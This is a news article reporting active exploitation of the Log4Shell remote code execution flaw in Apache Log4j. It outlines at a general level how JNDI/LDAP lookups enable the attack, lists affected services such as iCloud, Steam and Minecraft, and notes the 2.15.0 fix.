Critical 'Log4Shell' RCE zero-day exploited in large numbers

Source: Kevin Beaumont

Millions of applications use vulnerable Java logging library.

A simple to use exploit that can be used for remote code execution and to gain full control over millions of vulnerable enterprise systems through a Java logging library is currently being abused in large numbers, researchers warn.

The bug lies in Apache Foundation's open source Struts Log4J logging utility, in version 2.14 and earlier. 

It is caused by the Java Naming and Directory Interface (JNDI) application programming interface not protecting against lookups at attacker-controlled by endpoints, including ones that use the Lightweight Director Access Protocol (LDAP).

When a vulnerable application writes to a log file, the default Log4j configuration means the library looks up a server which, if an attacker controls it, can be set to send a malicious response from that system.

The response can contain a remote Java class file which is injected into the server process and executed with the same privileges as the vulnerable application using the logging library.

A proof of concept was published on Twitter and on Github, and the vulnerability is rated as a full 10 out of 10 possible on the common vulnerability scoring system (CVSS).

Computer emergency response teams around the world are now reporting active exploitation of the bug by automated systems.

Researchers have so far confirmed that Apple's iCloud service, Valve's gaming platform Steam, and Microsoft's popular Minecraft game are vulnerable to the bug, which is named Log4Shell.

In Minecraft, testers have reported they've been able to trigger the bug by pasting the exploit string into a chat window.

The Apache Foundation has issued log4j version 2.15.0, which is not vulnerable to Log4Shell  by default.

Administrators with older Log4j versions can also turn off the message lookups triggering the arbitrary code execution bug.

Chen Zhaojun of Alibaba's Cloud Security Team is credited with having found the bug.

apache cve202144228 java log4j2 log4shell security software struts

Understanding the next security control points: applications and workloads
Best security practices after rapid Digital Transformation
The CISO View 2021 Survey: Zero Trust and Privileged Access
How and why to backup your Office 365 tenant
ForgeRock for Australia&#8217;s Trusted Digital Identity Framework (TDIF)
Gravatar profile add-on leaks data on millions of users

Westpac acquires MoneyBrilliant from AMP

Qantas to uplift comms with five-year TPG Telecom deal

Westpac signs Flare up to use its banking-as-a-service platform

Case Study: Intrepid Group uses global travel shutdown to reimagine HR function
COVER STORY: Automation drives marketing success but complexity torments delivery
Case Study: Keeping CPA's board up to date about cybersecurity risks
Catastrophic governance failures are rooted in organisational culture
Fringe innovation unlocks power of diverse thinking
